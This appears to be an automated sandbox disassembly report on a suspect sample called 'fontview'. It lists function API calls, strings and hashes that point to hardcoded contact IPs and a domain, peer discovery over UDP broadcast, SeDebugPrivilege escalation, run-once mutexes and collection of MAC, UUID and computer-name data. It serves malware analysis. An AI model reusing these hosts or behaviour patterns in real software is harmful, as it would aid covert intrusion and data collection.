Function 1004BAAE Relevance: 46.1, APIs: 25, Strings: 1, Instructions: 615fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 1004BCF9
___createFile.LIBCMT ref: 1004BD3A
GetLastError.KERNEL32(?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BD63
__dosmaperr.LIBCMT ref: 1004BD6A
GetFileType.KERNEL32(00000000,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BD7D
GetLastError.KERNEL32(?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BDA0
__dosmaperr.LIBCMT ref: 1004BDA9
CloseHandle.KERNEL32(00000000,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BDB2
__set_osfhnd.LIBCMT ref: 1004BDE2
__lseeki64_nolock.LIBCMT ref: 1004BE4C
__close_nolock.LIBCMT ref: 1004BE72
__chsize_nolock.LIBCMT ref: 1004BEA2
__lseeki64_nolock.LIBCMT ref: 1004BEB4
__lseeki64_nolock.LIBCMT ref: 1004BFAC
__lseeki64_nolock.LIBCMT ref: 1004BFC1
__close_nolock.LIBCMT ref: 1004C021

Part of subcall function 100411E8: CloseHandle.KERNEL32(00000000,1000DD8F,00000000,?,1004BE77,1000DD8F,?,?,?,?,?,?,?,1000DD8F,00000000,00000109), ref: 10041238
Part of subcall function 100411E8: GetLastError.KERNEL32(?,1004BE77,1000DD8F,?,?,?,?,?,?,?,1000DD8F,00000000,00000109), ref: 10041242
Part of subcall function 100411E8: __free_osfhnd.LIBCMT ref: 1004124F
Part of subcall function 100411E8: __dosmaperr.LIBCMT ref: 10041271

Part of subcall function 10037F1F: __getptd_noexit.LIBCMT ref: 10037F1F

__lseeki64_nolock.LIBCMT ref: 1004C043
CloseHandle.KERNEL32(00000000,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004C178
___createFile.LIBCMT ref: 1004C197
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004C1A4
__dosmaperr.LIBCMT ref: 1004C1AB
__free_osfhnd.LIBCMT ref: 1004C1CB
__invoke_watson.LIBCMT ref: 1004C1F9

Strings

@, xrefs: 1004BDCE

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd
String ID: @
API String ID: 710831883-2766056989
Opcode ID: 028b6c621d31f86aeed636b2d8108958d88111f8461befb549e19608a8c9b239
Instruction ID: 4bc8964a9d16cae8c67520329504f5e8b6c1dd015f7f366feaadc10eed736cac
Opcode Fuzzy Hash: 028b6c621d31f86aeed636b2d8108958d88111f8461befb549e19608a8c9b239
Instruction Fuzzy Hash: 5A220471D00A0A9FEB55CF68CC91BAD7BA1EB04390F344279E911EB2E2C7759D40C799

Function 1001A36C Relevance: 37.0, APIs: 12, Strings: 9, Instructions: 206
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

htons.WS2_32(?), ref: 1001A3C7
socket.WS2_32(00000002,00000001,00000000), ref: 1001A3E0
WSAGetLastError.WS2_32 ref: 1001A3F0
setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000004), ref: 1001A426
inet_ntoa.WS2_32(?), ref: 1001A434
_wprintf.LIBCMT ref: 1001A466
connect.WS2_32(?,?,00000010), ref: 1001A4AA
inet_addr.WS2_32(114.114.114.114), ref: 1001A51E

Part of subcall function 10016D1B: __EH_prolog.LIBCMT ref: 10016D20
Part of subcall function 10016D1B: _sprintf.LIBCMT ref: 10016D94

inet_addr.WS2_32 ref: 1001A570
inet_addr.WS2_32(47.76.212.112), ref: 1001A5A9
inet_addr.WS2_32(47.76.187.31), ref: 1001A5C1
inet_addr.WS2_32(47.76.24.248), ref: 1001A5D9

Strings

value.length() > 0, xrefs: 1001A45C
inc\http\Socket.cpp, xrefs: 1001A452
47.76.212.112, xrefs: 1001A5A4
47.76.187.31, xrefs: 1001A5BC
connect ip:%s , xrefs: 1001A493
Error (%s) in line: %d in file: %s, xrefs: 1001A461
47.76.24.248, xrefs: 1001A5D4
114.114.114.114, xrefs: 1001A519
DNSLookup result (%s):, xrefs: 1001A55A

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: inet_addr$ErrorH_prologLast_sprintf_wprintfconnecthtonsinet_ntoasetsockoptsocket
String ID: 114.114.114.114$47.76.187.31$47.76.212.112$47.76.24.248$DNSLookup result (%s):$Error (%s) in line: %d in file: %s$connect ip:%s $inc\http\Socket.cpp$value.length() > 0
API String ID: 1519317838-3972532071
Opcode ID: d7dae1ff96ce2e9e4ab841948fc23fca1489f10708eb42359bd744715b7b5237
Instruction ID: 7b49e0120e11b4ab11456f49e9eb18eb1437e29c51d74eb201d297852d276499
Opcode Fuzzy Hash: d7dae1ff96ce2e9e4ab841948fc23fca1489f10708eb42359bd744715b7b5237
Instruction Fuzzy Hash: A6717C70508741AFD724CF69C885A6EB7F5FF89310F508A2EF5A6C62A1D731E984CB12

Function 1001A6D8 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 173
synchronizationsleepCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 1001A6DD

Part of subcall function 1001136C: CoCreateGuid.OLE32(?), ref: 1001138D
Part of subcall function 1001136C: _fprintf.LIBCMT ref: 100113A5

Part of subcall function 1001C213: __EH_prolog.LIBCMT ref: 1001C218
Part of subcall function 1001C213: GetComputerNameA.KERNEL32(?,?), ref: 1001C273

_sprintf.LIBCMT ref: 1001A741

Part of subcall function 10001898: _sprintf.LIBCMT ref: 100018EE
Part of subcall function 10001898: _memmove.LIBCMT ref: 1000190C

Part of subcall function 100168F4: __EH_prolog.LIBCMT ref: 100168F9

OpenMutexA.KERNEL32(00100000,00000000,?), ref: 1001A7B4
GetLastError.KERNEL32(?,?,?,?,?), ref: 1001A7BC
OpenMutexA.KERNEL32(00100000,00000000,?), ref: 1001A7DF
GetLastError.KERNEL32(?,?,?,?,?), ref: 1001A7E7
ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A815
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A818
ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A83B
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A83E
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?), ref: 1001A852
CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 1001A87C
CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 1001A893
GetLastError.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A89A
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8AD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8B5
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8BD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8C5

Strings

jkdi%42&!#, xrefs: 1001A746, 1001A74B, 1001A758
13a.dh7483y.com, xrefs: 1001A730
%s%s, xrefs: 1001A73B

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Mutex$CloseHandleRelease$CreateErrorH_prologLast$Open_sprintf$ComputerGuidNameSleep_fprintf_memmove
String ID: %s%s$13a.dh7483y.com$jkdi%42&!#
API String ID: 1969416865-4094921056
Opcode ID: b4b3263dde0bb6df3b479309dc3643e6ae1af02ec3241fba3ce66be87d0a3e12
Instruction ID: a8d946be910b25d93d618c846ade29e6a59fa686ccbc9f3ba0165ef815e5f331
Opcode Fuzzy Hash: b4b3263dde0bb6df3b479309dc3643e6ae1af02ec3241fba3ce66be87d0a3e12
Instruction Fuzzy Hash: 7D518171D04268EFEB11DBA4CC95FEE7BB8EF04340F440029F505A7192DB74AA89CBA5

Function 1001C9A2 Relevance: 33.8, APIs: 11, Strings: 8, Instructions: 509
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

htons.WS2_32(00005CE3), ref: 1001C9DE
inet_addr.WS2_32(255.255.255.255), ref: 1001C9EE
setsockopt.WS2_32 ref: 1001CA0D

Part of subcall function 100022F0: gethostname.WS2_32(?,00000100), ref: 1000230B

Sleep.KERNELBASE(0000000A), ref: 1001CAB7
sendto.WS2_32(?,?,?,00000000,?,?), ref: 1001CB24
recvfrom.WS2_32(?,?,00000400,00000000,?,?), ref: 1001CE9D
WSAGetLastError.WS2_32(?,?,00000000,?,?,?,?,?,bck,00000000,?), ref: 1001CEAC
_memcmp.LIBCMT ref: 1001CF08
closesocket.WS2_32(?), ref: 1001D104

Strings

bck_w, xrefs: 1001CC3A, 1001CC4E
127.0.0.1, xrefs: 1001CF02
255.255.255.255, xrefs: 1001C9E4
bckhst, xrefs: 1001CBB6, 1001CCE9, 1001CCFD
serch recvfrom :%s., xrefs: 1001CB40
recvfrom compare is faild szIPAddr:%s.res:%d bWaitStart:%d, xrefs: 1001CFCC
[%d]Find szIPAddr:%s.Host:%s is not same., xrefs: 1001CF45
bck, xrefs: 1001CA55, 1001CA5A, 1001CA62, 1001CCB7, 1001CCCB

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: ErrorLastSleep_memcmpclosesocketgethostnamehtonsinet_addrrecvfromsendtosetsockopt
String ID: 127.0.0.1$255.255.255.255$[%d]Find szIPAddr:%s.Host:%s is not same.$bck$bck_w$bckhst$recvfrom compare is faild szIPAddr:%s.res:%d bWaitStart:%d$serch recvfrom :%s.
API String ID: 2742795110-796237128
Opcode ID: 825255176a69660cc3590cc8406f4287b336bf92dea0443eec03fd7548000463
Instruction ID: 71a6e8450f25750b8eb19ae326af7dcd83f814d640ad7f3094fd8df69461fb78
Opcode Fuzzy Hash: 825255176a69660cc3590cc8406f4287b336bf92dea0443eec03fd7548000463
Instruction Fuzzy Hash: 5D12A335108385AEE331DB20C891FEBB7E9EF95344F50491EE5CA86092DB71E989CB53

Function 10011C4E Relevance: 33.8, APIs: 3, Strings: 16, Instructions: 500
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 10011C53

Part of subcall function 100021EB: GetAdaptersInfo.IPHLPAPI(00000000,00000001), ref: 10002209

_free.LIBCMT ref: 100121B7
_free.LIBCMT ref: 100121CC

Strings

list, xrefs: 1001213D
err_cdn, xrefs: 1001204B, 10012058, 1001205D, 1001205E
host, xrefs: 10011EDE, 10011EED, 10011EEE
err_info, xrefs: 100120DC, 100120E9, 100120EF, 100120F0
err_code, xrefs: 10012002, 10012011, 10012018
is_down, xrefs: 10011FBA, 10011FC9, 10011FD0
uuid, xrefs: 10011E33, 10011E46, 10011E47
d_plat, xrefs: 1001206C, 1001207B, 10012082
is_exe, xrefs: 10011FDE, 10011FED, 10011FF4
mac, xrefs: 10011DF7, 10011E0A, 10011E0B
plug_id, xrefs: 10011F99, 10011FA6, 10011FAB, 10011FAC
sys_res, xrefs: 10011E90, 10011E9F, 10011EA0
version, xrefs: 10012090, 1001209F, 100120A6
c_post_id, xrefs: 10011E6F, 10011E82, 10011E83
1.0.0.64, xrefs: 10011EB0, 10011ECC, 10011ECD
client_id, xrefs: 10011D7C, 10011D8F, 10011D90

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _free$AdaptersH_prologInfo
String ID: 1.0.0.64$c_post_id$client_id$d_plat$err_cdn$err_code$err_info$host$is_down$is_exe$list$mac$plug_id$sys_res$uuid$version
API String ID: 2722462171-1692044417
Opcode ID: 1747b20f197bfeb9091966adac114b40a9d636083f5a557c6abb1ab39a3ab58b
Instruction ID: f90d9264f1c1e6498c44510829453a28db1729ed47331b4b3d70f0524b460866
Opcode Fuzzy Hash: 1747b20f197bfeb9091966adac114b40a9d636083f5a557c6abb1ab39a3ab58b
Instruction Fuzzy Hash: 3B02D570910199AEEB19CB74CC45FEEBBB9EF46340F0441ACE406DB196DB70AE85CB60

Function 1001A9A0 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 194
synchronizationsleepthreadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringA.KERNEL32(---------------->is null!!!!!!!!!!!!!!!!), ref: 1001A9EB
CreateMutexA.KERNEL32(00000000,00000000,null1), ref: 1001A9FA
Sleep.KERNEL32(000001F4,00000069,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001AB66
CreateThread.KERNELBASE(00000000,00000000,Function_0001A91C,00000000,00000000,?), ref: 1001AB89

Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAD5
Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAEF
Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB04
Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB1D

ReleaseMutex.KERNEL32(00000000), ref: 1001ABD0
CloseHandle.KERNEL32 ref: 1001ABD8
ReleaseMutex.KERNEL32 ref: 1001ABE0
CloseHandle.KERNEL32 ref: 1001ABE8
Sleep.KERNEL32(000001F4), ref: 1001AC02
TerminateThread.KERNEL32(00000230,00000000), ref: 1001AC13
CloseHandle.KERNEL32 ref: 1001AC1F

Part of subcall function 1001B976: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00100000,Local\jkhgjfgs3gGwsef), ref: 1001B98B
Part of subcall function 1001B976: GetLastError.KERNEL32(?,?,1001A9D0), ref: 1001B99A

Part of subcall function 1000C15A: __vsnprintf_s.LIBCMT ref: 1000C194
Part of subcall function 1000C15A: _memmove.LIBCMT ref: 1000C1E9

Part of subcall function 1001C2A5: GetCurrentProcess.KERNEL32(000F01FF,?,?,?,?,?,1001A9E0), ref: 1001C2B5
Part of subcall function 1001C2A5: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,1001A9E0), ref: 1001C2BC
Part of subcall function 1001C2A5: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 1001C2D2
Part of subcall function 1001C2A5: AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 1001C302
Part of subcall function 1001C2A5: CloseHandle.KERNEL32(?,?,?,?,?,1001A9E0), ref: 1001C30F

Strings

Input param:%s, xrefs: 1001AA46
->FILE_APP mutex is existing, xrefs: 1001AAB9, 1001AABE, 1001AAC6
null1, xrefs: 1001A9F1
---------------->is null!!!!!!!!!!!!!!!!, xrefs: 1001A9E6
->FILE_APP today is runing, xrefs: 1001AB2B, 1001AB30, 1001AB38
555prc4xnupd, xrefs: 1001AA21, 1001AA45
get:%s, xrefs: 1001AA8F
CheckApp:%d text:%s, xrefs: 1001AB1A

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CloseHandle_malloc$CreateMutex$ProcessReleaseSleepThreadToken$AdjustCurrentDebugErrorFileLastLookupMappingOpenOutputPrivilegePrivilegesStringTerminateValue__vsnprintf_s_memmove
String ID: ->FILE_APP mutex is existing$ ->FILE_APP today is runing$---------------->is null!!!!!!!!!!!!!!!!$555prc4xnupd$CheckApp:%d text:%s$Input param:%s$get:%s$null1
API String ID: 3952390217-1909696795
Opcode ID: 280b496bb56ebac9d35dd4fced43be9eab9cfee4624935922c9607c6b1f76cc6
Instruction ID: b9528a95e4524d17b4f6d8a13efaef8769615a14464e7c918a77bf7d60e1a239
Opcode Fuzzy Hash: 280b496bb56ebac9d35dd4fced43be9eab9cfee4624935922c9607c6b1f76cc6
Instruction Fuzzy Hash: 3B61F475504350AFE710EF25CC89EAF7BE9EF85350F00052EF545961A2DB70EA84CBA2

Function 1001570F Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 176
synchronizationCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 10015714

Part of subcall function 1001C213: __EH_prolog.LIBCMT ref: 1001C218
Part of subcall function 1001C213: GetComputerNameA.KERNEL32(?,?), ref: 1001C273

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

_sprintf.LIBCMT ref: 100157C1
OpenMutexA.KERNEL32(00100000,00000000,?), ref: 10015839
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 10015843
OpenMutexA.KERNEL32(00100000,00000000,?), ref: 1001586A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 1001586E
CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 10015899
CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 100158AE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158B5
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158CA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158D8
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158E0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158E8

Strings

%s%s%saz$%^$%@#sa$EEFsd2, xrefs: 100157BB
m, xrefs: 1001574B
2#b.dg7983%1io, xrefs: 100157AE, 100157B4
gnbc344asd, xrefs: 100157D4, 100157D9, 100157E1

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Mutex$ErrorH_prologLast$CloseCreateHandleOpenRelease$ComputerName_sprintf
String ID: %s%s%saz$%^$%@#sa$EEFsd2$2#b.dg7983%1io$gnbc344asd$m
API String ID: 2639461599-1078873301
Opcode ID: 32efccec15df40e9f32f2101961871b350cb3ef953033ed113608a976098ee04
Instruction ID: db7850e3fd9d69c0528ec08768e9ac04465b1e639cfc869010542aedb86768d4
Opcode Fuzzy Hash: 32efccec15df40e9f32f2101961871b350cb3ef953033ed113608a976098ee04
Instruction Fuzzy Hash: F0615FB1D00228EFEB11DFA4CC91ADEB7BDFF18250F54406AE506A7152DB70AA84CF65

Function 1001D388 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 270
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10003256: _memmove.LIBCMT ref: 100032C6

socket.WS2_32(00000002,00000002,00000011), ref: 1001D429
WSAGetLastError.WS2_32 ref: 1001D43A
htons.WS2_32(?), ref: 1001D457
setsockopt.WS2_32(00000000,0000FFFF,00000020,?,00000001), ref: 1001D47C
setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 1001D49C
setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000004), ref: 1001D4B4
sendto.WS2_32(00000000,?,?,00000000,000000FF,00000010), ref: 1001D4DC
recvfrom.WS2_32(00000000,?,00000400,00000000,?,?), ref: 1001D545
inet_ntoa.WS2_32(?), ref: 1001D558
Sleep.KERNEL32(0000000A), ref: 1001D65A
closesocket.WS2_32(00000000), ref: 1001D693
Sleep.KERNELBASE(000003E8), ref: 1001D69E

Strings

res, xrefs: 1001D3F0, 1001D3F5, 1001D404
req, xrefs: 1001D3CC, 1001D3D1, 1001D3D9

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: setsockopt$Sleep$ErrorLast_memmoveclosesockethtonsinet_ntoarecvfromsendtosocket
String ID: req$res
API String ID: 3206013018-3551752921
Opcode ID: c606c7f4e31491b364e443341f0c510239e8ca9e0761373d92bec0b92cf65dcb
Instruction ID: f0e5c5a51288f6555a9495399a3376c632556063d47a78e4a63fd70f32be9dbf
Opcode Fuzzy Hash: c606c7f4e31491b364e443341f0c510239e8ca9e0761373d92bec0b92cf65dcb
Instruction Fuzzy Hash: 9B91D472108781AFE310EF24CC85BAABBE9EF49354F00461AF585CB1D1DB71E989CB52

Function 1000DD2B Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 377
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 1000DD30

Part of subcall function 10033C98: __fsopen.LIBCMT ref: 10033CA3

__fread_nolock.LIBCMT ref: 1000DDAB
_memmove.LIBCMT ref: 1000DE27
__localtime64.LIBCMT ref: 1000DEBE
__time64.LIBCMT ref: 1000DEE7
__localtime64.LIBCMT ref: 1000DEFF

Part of subcall function 100344AB: __gmtime64_s.LIBCMT ref: 100344BE

_sprintf.LIBCMT ref: 1000DF50

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

GetLastError.KERNEL32(?,?,?,10006588,?,00000000), ref: 1000E029
__time64.LIBCMT ref: 1000E0D5
_sprintf.LIBCMT ref: 1000E113

Strings

%d-%s-%s, xrefs: 1000E10D
O:%d-%d-%d %02d:%02d:%02d N:%d-%d-%d %02d:%02d:%02d ID:%s, xrefs: 1000DF4A
time file is null, xrefs: 1000E005, 1000E00A, 1000E015
File time update faild,can't create file., xrefs: 1000E153, 1000E158, 1000E163

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prolog__localtime64__time64_sprintf$ErrorLast__fread_nolock__fsopen__gmtime64_s_memmove
String ID: %d-%s-%s$File time update faild,can't create file.$O:%d-%d-%d %02d:%02d:%02d N:%d-%d-%d %02d:%02d:%02d ID:%s$time file is null
API String ID: 1195966642-4095322339
Opcode ID: e1fb886c5aeb8dbae39b044ecd0a81fa01c9e8e7afcd57a19af7fa8add68997b
Instruction ID: 3c64a6cba0836d90df9f4256677c0f3f46e6d179118a5539ab0e8369d48d467e
